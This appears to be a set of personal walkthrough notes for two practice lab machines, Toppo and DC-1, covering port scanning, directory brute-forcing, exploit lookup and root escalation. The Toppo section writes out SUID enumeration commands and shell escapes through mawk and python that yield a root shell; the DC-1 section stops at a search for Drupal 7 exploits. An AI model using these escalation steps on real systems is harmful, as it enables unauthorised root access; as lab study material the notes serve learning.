TOPPO:

nmap [targetIP] -v -Pn -p-
  port 80
  port 23

open web browser -> plug in IPaddress -> inspect source code

DIRB to look for hidden files -> type in "dirb http://[targetIP]
  look for /admin, notes.txt, /robot.txt, 

Try to ssh -> ssh username@targetIP > hit enter > type password 

once in look for known exploit > uname -a > to see kernel version > use searchploit > 
type "searchploit OS X.X.X-X" > wait for result and exploit accordingly

look for binaries SUID, GUID > use the SUID > look for mawk, python
# Find SUID 
  find / -perm -u=s -type f 2>/dev/null 
# Find GUID 
  find / -perm -g=s -type f 2>/dev/null

-----------------------------------------------------------------------------------------------
use mawk > mawk 'BEGIN {system("/bin/sh")}' > if you see that pound '#' sign, you are now root

navigate throught it > ls > cd /root > ls > keep using ls and cd till you find the juice

open all txt files that you find > cat file.txt
------------------------------------------------------------------------------------------------
use python whatever version found, we'll use 2 > python2 -c 'import pty;pty.spawn("/bin/sh")' > 
if you see the #, you are now root
------------------------------------------------------------------------------------------------

===================================================================================
DC-1:

# Find the target
netdiscover -i eth0

# Nmap to see them open ports
nmap [targetIP] -v -Pn -p-

# look for port 22, 80
if theres 80, open it up in browser

# Look for the web technologies running in the target
whatweb [targetIP]

# don't forget to check the robot.txt
go to browser and type in url "[targetIP]/robot.txt"

# look for useful info

# look for vulnerabilities using searchploit
searchploit Drupal 7



































